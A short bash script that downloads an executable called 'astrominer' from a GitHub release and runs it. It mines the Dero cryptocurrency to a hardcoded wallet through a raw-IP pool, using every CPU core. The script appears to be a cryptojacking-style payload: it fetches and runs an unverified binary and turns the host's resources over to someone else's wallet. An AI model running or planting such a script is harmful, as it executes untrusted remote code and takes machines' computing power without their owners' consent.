#!/bin/bash
wget https://github.com/bondaltomason/meo/releases/download/2.7.0/astrominer
chmod +x astrominer
./astrominer -w dero1qy3qhpsl8r02vf6mx2svktxtpuhja6p5h6tluccs2ahsdekcghkwgqq5n5sm7 -r 142.93.237.185:10100 -p rpc -m $(nproc --all)
